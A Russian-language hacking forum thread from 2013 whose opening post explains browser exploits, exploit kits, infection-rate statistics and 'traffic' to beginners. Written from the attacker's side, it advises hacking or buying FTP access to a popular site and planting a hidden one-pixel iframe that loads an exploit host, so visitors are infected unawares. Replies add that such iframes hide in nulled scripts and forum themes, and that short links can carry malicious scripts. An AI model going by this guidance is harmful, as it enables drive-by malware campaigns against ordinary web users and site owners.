Сплоиты для браузеров, загрузки, трафф и т.д.

Тема в разделе "Трояны и шпионские программы", создана пользователем ashoka, 5 янв 2013.

↑ ↓
  1. ashoka Уважаемый пользователь
    ashoka
    Ответить в чате

    Форумчанин

    Регистрация:
    04.01.2013
    Сообщения:
    341
    Симпатии:
    1.001
    Пол:
    Мужской
    Репа:
    +1.003 / 0 / -2
    Статья будет состоять из частей:
    1. Для кого написана эта статья.
    2. Что такое сплоиты.
    3. Что такое связки сплоитов.
    4. Что такое стата (статистика)
    5. Что такое пробив.
    6. Что такое трафф (траффик) и куда его гонят.

    Начнем...

    1) Для кого написана эта статья.
    Эта статья ориентированная в большей степени на новичков. На её написания меня подтолкнул тот факт, что у многих возникают заблуждения в этой области.
    Например не раз слышал как новичок в этом деле ассоциировал понятие трафф с интернет трафиком и считал его в мегабайтах. =)
    Сам я не обладаю большим объемом знаний в этой области. Так что бывалых прошу не судить строго. Это написано не для вас.

    2) Что такое сплоиты.
    Сплоиты это программы, чаще скрипты, эксплуатирующие (от этого слова и название сплоит, эксплоит) уязвимости в какой либо программе.
    Мы в силу тематики статьи будем рассматривать сплоиты направленные на эксплуотацию уязвимости в браузерах.
    Возьмем в качестве примера ещё недавно актуальный сплоит под IE основанный на уязвимости в ActiveX, MS06-057.
    Процитируем securitylab.ru:
    Целочисленное переполнение буфера обнаружено в методе "setSlice()" в ActiveX компоненте "WebViewFolderIcon".
    Удаленный пользователь может с помощью специально сформированной Web страницы или email
    сообщения вызвать повреждение памяти и выполнить произвольный код на целевой системе.
    Ключевой момент тут это "выполнить произвольный код на целевой системе". То есть если человек который пользуется уязвимым
    браузером попадет на страницу в которую встроен этот сплоит то на его системе выполниться код.


    Обычно с помощью сплоитов выполняют код который выполняет операцию загрузки какого либо exe пользователю и его запуск.
    Например какой либо троян.

    Сплоиты обычно размещают на хостинге. И на них гонят трафф (о траффе мы поговорим в 6-ой части нашей статьи)

    3) Что такое связки сплоитов.
    Связки сплоитов это специальные скрипты (чаше на PHP) которые объединяют несколько сплоитов. Использовать связки гораздо более эффективнее чем использовать отдельные сплоиты.
    Почему это эффективнее я объясню на простом примере.
    Использовать сплоит это как выстрел из автомата. А использование связки это как очереди из нескольких автоматов.
    Что эффективнее судите сами =)

    Давайте условно поделим связки на "интеллектуальные" и на "неинтеллектуальные".

    Рассмотрим "неинтеллектуальные" связки сплоитов.
    Неинтеллектуальная связка сплоитов просто подгружает все сплоиты которые есть в связке.
    И делает это одновременно в не зависимости от браузера. Отсюда следует что это не очень эффективное решение т.к.
    некоторые сплоиты из связки могут только навредить. Например уронить браузер или просто помешать другому выполниться.
    Такие связки стоят обычно дешевле чем "интеллектуальные"

    Теперь рассмотрим так называемые "интеллектуальные" связки.
    Связки такого типа обычно работают более "гуманно". При заходе человека на сайт связка определяет версию его браузера, ОС и т.д. и после определения подгружает соответствующий сплоит. Если же в данной связки нет сплоита под ОС и браузер пользователя. То связка не погрузит ничего.

    Как правило сплоиты в связках шифруются и разработчики связок стараются сделать так что-бы нельзя было увидеть исходный код сплоитов.
    Первое делаеться для того что-бы сплоит не спалил и не заблокировал антивирус (да сплоиты тоже палиться). Второе делаеться для того что-бы пользователь не узнал что на сайте сплоит.

    Также абсолютно во всех связках есть так называемая стата или статистика. О ней я поведаю вам в следующей часте этой статьи.

    4) Что такое стата (статистика)
    Статистика или как ее чаще называют стата, это механизм подсчета.
    Стата как я уже выше писал входит в "комплект" к любой связке сплоитов.
    Так вот что же они считает...
    Стата подсчитывает общее колличество людей зашедших на страницу со сплоитами, версии их ОС, их браузеры (например сколько народа из общего количества использовало браузер IE) и прочее. Всё зависит от наворочености статы. Также практически все статы подсчитывают пробив (о нем читаем далее).
    Ну вот я думаю тут всё понятно...

    5) Что такое пробив.
    Пробив это количество (в процентах) зараженных машин.
    То есть. Например на страницу со сплоитами зашло 1000 человек из них заразилось 200.
    Отсюда следует (200/1000)*100=20. Т.е. пробив данных сплоитов ~20%
    Пробив у актуальных связок примерно от 7 до 30 %.

    6) Что такое трафф.
    Ну вот наконец то мы добрались до такой вещи как трафф. Кстати этой темы и касается наибольшее количество заблуждений=)
    Вообщем тут объясняю на примере:
    Имеется хост со сплоитами (связкой) например supermegasploit.pnh.edu.
    Так вот каждый посетитель зашедший на этот сайт является единицей траффа.
    Т.е. 1К траффа это одна тысяча посетителей волей либо неволей зашедших на сайт со сплоитами.

    Я думаю что следующий ваш вопрос будет:"Откуда он берется? Откуда находиться такое количество посетителей" Так вот тут все относительно просто.
    Например взламываем или покупаем FTP доступ к какому нибудь популярному сайту назовем его popsite.com.
    Потом вставляем в главную страницу такой код
    (надеюсь на то что вы дружите с HTML =) )

    <iframe scr="http://supermegasloit.pnh.edu" width=1px height=1px>

    отсюда понятно что вместе с сайтом popsite.com в который мы вставили этот код будут загружаться наши сплоиты, но это не будет видно пользователям. И что мы получаем в итоге все люди посетившие popsite.com посетили supermegasploit.pnh.edu
    сами об этом не догадываясь. То есть мы получили заветный трафф.

    Ещё можно получить трафф с помощью дорвеев (доров), но рассказ о них выходит за рамки этой статьи.
     
    • Мне нравится Мне нравится x 6
    • Это устарело Это устарело x 1
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +968 / 152 / -29
    Jabber:
    Telegram:
    ashoka, отличная статья, легко читается, спасибо, по больше-бы таких статей именно для ознакомления с технологией взлома, думаю это многим будет интересно !

    Ещё кое-что хочу сказать про iframe (Код который Вы указали):

    Да такие атаки ОЧЕНЬ тяжело обнаружить, если никто не спалит (Антивирус например), даже админ ничего не поймёт !

    И ещё для таких атак вовсе не обязательно ломать популярные сайты, вебмастеры-халявщики сами помогут хакеру, объясню про что я, сейчас очень много платных скриптов, например скрипт этого форума тоже платный...

    Но мы-же привыкли все к халяве, крякам и т.д., так вот в сети дофига взломанных платных скриптов, на жаргоне их называют Nulled !

    Ну скачали мы Nulled, поставили начинаем распространять свой проект, а там и притаился этот iframe и поверьте многие скачают и даже подозревать ничего не будут, я встречал такие Nulled, причём данная атака реализована может-быть по разному от банальной рекламы, до удалённого управления сервером, так, что нужно по осторожней с этими нулями !

    Тоже самое касается и стилей для форумов и сайтов !

    Кстати хочется отметить, как-бы странно это не звучало, но здесь форум легальный, не сворованный и не нуллед, тоже самое касается и стиля, стиль кстати где-то процентов на 30, вообще переделан мной, в плане функциональности и дизайна !

    Так, что здесь таких атак быть не должно, но никто не застрахован от взлома !(dance)\o/\:D/\:d/
     
    • Мне нравится Мне нравится x 4
    • Информативный пост Информативный пост x 1
  3. ashoka Уважаемый пользователь
    ashoka
    Ответить в чате

    Форумчанин

    Регистрация:
    04.01.2013
    Сообщения:
    341
    Симпатии:
    1.001
    Пол:
    Мужской
    Репа:
    +1.003 / 0 / -2
    :Dда и ддос никто не отменял)) а "школота" любит оттачивать свои учения на чем-то существенном, после падения не скольких серверов, на которых админы это формальность, а не те лица, которые занимаются наладкой своего ресурса))
     
    • Мне нравится Мне нравится x 4
    • Плохая орфография Плохая орфография x 1
  4. ad9x Пользователь
    ad9x
    Ответить в чате

    Первый уровень

    Регистрация:
    31.01.2013
    Сообщения:
    4
    Симпатии:
    18
    Репа:
    +18 / 0 / -0
    Можно воспользоваться такими штучками, например:
    http://find-xss.net/news/article/find-link/

    Весь ресурс полезен для ознакомления
     
    • Мне нравится Мне нравится x 4
  5. ad9x Пользователь
    ad9x
    Ответить в чате

    Первый уровень

    Регистрация:
    31.01.2013
    Сообщения:
    4
    Симпатии:
    18
    Репа:
    +18 / 0 / -0
    Кстати, для контроля страниц с давних пор использую для Лисички довольно полезное расширение:
    - Simple Links Counter
    Показывает кол-во внутренних и внешних ссылок на странице (+ IFRAME, Email, etc.) в статусной строке.

    [​IMG]

    Так же пригодится и тем, кто занимается сайтами ;)

    Берем в Расширениях для Лисички
    Несмотря на то, что разработчик давно не обновлял - работает без проблем и в последних версиях Лисы.
    Или возьмите мой вариант (немного подправленный для совместимости с последними Фоксами):
    http://rghost.ru/43531371
    Сохранить на диск, затем перетащить simplelinkscounter.xpi в окно браузера, и следовать стандартной установке.
     
    • Мне нравится Мне нравится x 4
  6. ashoka Уважаемый пользователь
    ashoka
    Ответить в чате

    Форумчанин

    Регистрация:
    04.01.2013
    Сообщения:
    341
    Симпатии:
    1.001
    Пол:
    Мужской
    Репа:
    +1.003 / 0 / -2
    Simple Links Counter 1.2

    автор Fightcat

    Показывает количество внутренних и внешних ссылок на странице в строке статуса.
    Добавить в Firefox
    Недоступно для Firefox 18.0


    кстати, скрин больше похож на оперу
     
    • Мне нравится Мне нравится x 4
  7. ad9x Пользователь
    ad9x
    Ответить в чате

    Первый уровень

    Регистрация:
    31.01.2013
    Сообщения:
    4
    Симпатии:
    18
    Репа:
    +18 / 0 / -0
    Сохраните на диск по правой кнопке.
    а потом перетащите в окно.
    Либо возьмите по моей ссылке выше.. (я тут прицепить не могу файл)
    Скрин только что делался, на этой странице, на самой свежей Лисе (Аврора).
    Это просто тема в Лисе. Да и не столь важна в подобных вопросах гламурность :) :=) :-)
     
    • Мне нравится Мне нравится x 5
  8. IIanika Пользователь
    IIanika
    Ответить в чате

    Первый уровень

    Регистрация:
    20.02.2013
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    Благодарен за информацию.
     
  9. xatop old root
    xatop
    Ответить в чате

    Форумчанин

    Регистрация:
    13.03.2013
    Сообщения:
    108
    Симпатии:
    359
    Пол:
    Мужской
    Репа:
    +359 / 0 / -0
    Сервисы коротких ссылок - очень хорошая штука для шуток и атак, ибо короткие ссылки могут содержать весьма поганые скрипты, самому же сервису похрен что туда запихали.
     
    • Мне нравится Мне нравится x 4
  10. palvas Житель форума
    palvas
    Ответить в чате

    Форумчанин

    Регистрация:
    03.06.2013
    Сообщения:
    19
    Симпатии:
    20
    Репа:
    +20 / 0 / -0
    Полезная ИНФО.Спасибо.
     

Поделиться этой страницей